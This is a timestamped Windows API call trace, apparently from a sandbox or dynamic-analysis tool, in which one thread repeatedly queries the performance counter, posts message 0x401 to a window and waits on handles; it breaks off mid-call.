1 [0172.502] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.502] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x373a0654, lParam=0x3d09) returned 1 [0172.502] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099132104173) returned 1 [0172.518] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099133662171) returned 1 [0172.518] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.518] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x373a44ad, lParam=0x3d09) returned 1 [0172.518] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099133701925) returned 1 [0172.534] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099135262447) returned 1 [0172.534] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.534] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x373a8330, lParam=0x3d09) returned 1 [0172.534] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099135315461) returned 1 [0172.550] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099136866642) returned 1 [0172.550] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.550] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x373ac1da, lParam=0x3d09) returned 1 [0172.550] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099136905841) returned 1 [0172.566] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099138466615) returned 1 [0172.566] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.566] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x373b005a, lParam=0x3d09) returned 1 [0172.566] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099138503530) returned 1 [0172.582] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099140062196) returned 1 [0172.582] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.582] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x373b3ead, lParam=0x3d09) returned 1 [0172.582] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099140101736) returned 1 [0172.598] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099141663643) returned 1 [0172.598] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.598] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x373b7d3c, lParam=0x3d09) returned 1 [0172.598] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099141704454) returned 1 [0172.614] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099143270564) returned 1 [0172.614] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.614] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x373bbc01, lParam=0x3d09) returned 1 [0172.614] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099143309649) returned 1 [0172.630] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099144857654) returned 1 [0172.630] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.630] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x373bfa00, lParam=0x3d09) returned 1 [0172.630] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099144888226) returned 1 [0172.646] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099146459858) returned 1 [0172.646] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.646] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x373c3896, lParam=0x3d09) returned 1 [0172.646] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099146513262) returned 1 [0172.663] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099148341970) returned 1 [0172.665] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099148380586) returned 1 [0172.678] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099149659460) returned 1 [0172.678] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099149676757) returned 1 [0172.694] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099151260576) returned 1 [0172.694] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099151276249) returned 1 [0172.709] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099152835328) returned 1 [0172.709] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099152850772) returned 1 [0172.725] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099154440309) returned 1 [0172.726] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099154471402) returned 1 [0172.741] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099156038521) returned 1 [0172.742] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099156056916) returned 1 [0172.757] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099157637242) returned 1 [0172.758] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099157654855) returned 1 [0172.773] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099159239040) returned 1 [0172.780] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099159882495) returned 1 [0172.789] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099160849508) returned 1 [0172.790] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099160872708) returned 1 [0172.805] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099162436439) returned 1 [0172.805] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099162449584) returned 1 [0172.821] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099164031614) returned 1 [0172.821] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099164045290) returned 1 [0172.837] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099165636281) returned 1 [0172.837] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099165650258) returned 1 [0172.853] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099167233847) returned 1 [0172.853] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0172.854] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0176.593] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099541218854) returned 1 [0176.597] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099541565094) returned 1 [0176.597] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.597] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37788262, lParam=0x3d09) returned 1 [0176.597] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099541606075) returned 1 [0176.613] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099543165529) returned 1 [0176.613] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.613] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3778c0e7, lParam=0x3d09) returned 1 [0176.613] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099543204832) returned 1 [0176.630] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099544901135) returned 1 [0176.630] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.630] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377904b3, lParam=0x3d09) returned 1 [0176.630] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099544936507) returned 1 [0176.645] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099546368987) returned 1 [0176.645] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.645] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37793e09, lParam=0x3d09) returned 1 [0176.645] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099546406126) returned 1 [0176.661] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099547966369) returned 1 [0176.661] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.661] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37797c6f, lParam=0x3d09) returned 1 [0176.661] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099548008865) returned 1 [0176.677] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099549576196) returned 1 [0176.677] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.677] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3779bb51, lParam=0x3d09) returned 1 [0176.677] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099549625324) returned 1 [0176.693] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099551173311) returned 1 [0176.693] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.693] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3779f9b5, lParam=0x3d09) returned 1 [0176.693] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099551222295) returned 1 [0176.709] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099552783252) returned 1 [0176.709] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.709] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377a3898, lParam=0x3d09) returned 1 [0176.709] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099552824628) returned 1 [0176.725] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099554374151) returned 1 [0176.725] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.725] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377a76bd, lParam=0x3d09) returned 1 [0176.725] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099554434556) returned 1 [0176.743] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099556190568) returned 1 [0176.743] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.743] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377abdb1, lParam=0x3d09) returned 1 [0176.743] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099556230133) returned 1 [0176.759] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099557783043) returned 1 [0176.759] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.759] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377afbe6, lParam=0x3d09) returned 1 [0176.759] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099557817220) returned 1 [0176.775] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099559369689) returned 1 [0176.775] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.775] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377b39e0, lParam=0x3d09) returned 1 [0176.775] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099559423890) returned 1 [0176.791] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099560969410) returned 1 [0176.791] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.791] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377b785e, lParam=0x3d09) returned 1 [0176.791] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099561010346) returned 1 [0176.807] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099562585370) returned 1 [0176.807] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.807] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377bb77d, lParam=0x3d09) returned 1 [0176.807] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099562629194) returned 1 [0176.823] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099564173514) returned 1 [0176.823] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.823] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377bf587, lParam=0x3d09) returned 1 [0176.823] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099564215091) returned 1 [0176.839] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099565774244) returned 1 [0176.839] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.839] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377c340e, lParam=0x3d09) returned 1 [0176.839] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099565826080) returned 1 [0176.855] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099567370690) returned 1 [0176.855] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.855] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377c726a, lParam=0x3d09) returned 1 [0176.855] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099567417799) returned 1 [0176.871] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099568967900) returned 1 [0176.871] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.871] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377cb0cf, lParam=0x3d09) returned 1 [0176.871] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099569018862) returned 1 [0176.887] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099570575411) returned 1 [0176.887] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.887] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377cef9a, lParam=0x3d09) returned 1 [0176.887] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099570615916) returned 1 [0176.903] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099572167234) returned 1 [0176.903] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.903] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377d2dc8, lParam=0x3d09) returned 1 [0176.903] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099572208066) returned 1 [0176.919] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099573779749) returned 1 [0176.919] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.919] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377d6cc5, lParam=0x3d09) returned 1 [0176.919] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099573821009) returned 1 [0176.935] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099575371309) returned 1 [0176.935] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0176.935] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377daaf1, lParam=0x3d09) returned 1 [0176.935] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099575418910) returned 1 [0176.951] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099576975641) returned 1 [0176.951] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099576999995) returned 1 [0176.967] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099578575967) returned 1 [0176.967] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099578599670) returned 1 [0176.983] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099580168998) returned 1 [0176.983] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099580185669) returned 1 [0176.999] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099581767766) returned 1 [0176.999] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099581782885) returned 1 [0177.015] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099583364236) returned 1 [0177.015] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099583379631) returned 1 [0177.031] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099584973886) returned 1 [0177.031] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099584993578) returned 1 [0177.046] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099586546717) returned 1 [0177.047] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099586564762) returned 1 [0177.062] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099588142085) returned 1 [0177.063] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099588159652) returned 1 [0177.078] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099589735847) returned 1 [0177.078] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0177.078] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x377fdc0e, lParam=0x3d09) returned 1 [0177.079] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099589761705) returned 1 [0177.094] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099591347926) returned 1 [0177.095] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0177.095] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0180.648] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099946691781) returned 1 [0180.653] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099947201323) returned 1 [0180.653] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0180.653] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37b6678d, lParam=0x3d09) returned 1 [0180.654] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099947267096) returned 1 [0180.670] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099948932950) returned 1 [0180.670] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0180.670] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37b6ab31, lParam=0x3d09) returned 1 [0180.671] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099948967486) returned 1 [0180.685] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099950401757) returned 1 [0180.685] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0180.685] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37b6e491, lParam=0x3d09) returned 1 [0180.686] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099950534778) returned 1 [0180.701] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099952003637) returned 1 [0180.701] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0180.701] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37b72324, lParam=0x3d09) returned 1 [0180.701] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099952036537) returned 1 [0180.717] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099953597201) returned 1 [0180.717] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0180.717] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37b76164, lParam=0x3d09) returned 1 [0180.717] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099953624729) returned 1 [0180.733] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099955211122) returned 1 [0180.733] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0180.734] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37b7a06f, lParam=0x3d09) returned 1 [0180.734] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099955273708) returned 1 [0180.749] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099956839452) returned 1 [0180.749] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0180.750] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37b7e00a, lParam=0x3d09) returned 1 [0180.750] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099956873366) returned 1 [0180.766] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099958459314) returned 1 [0180.766] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0180.766] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37b81f51, lParam=0x3d09) returned 1 [0180.766] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099958508062) returned 1 [0180.781] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099960003299) returned 1 [0180.781] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0180.781] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37b85ba0, lParam=0x3d09) returned 1 [0180.781] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099960036916) returned 1 [0180.797] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099961607462) returned 1 [0180.797] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0180.797] PostMessageW (hWnd=0x103e4, 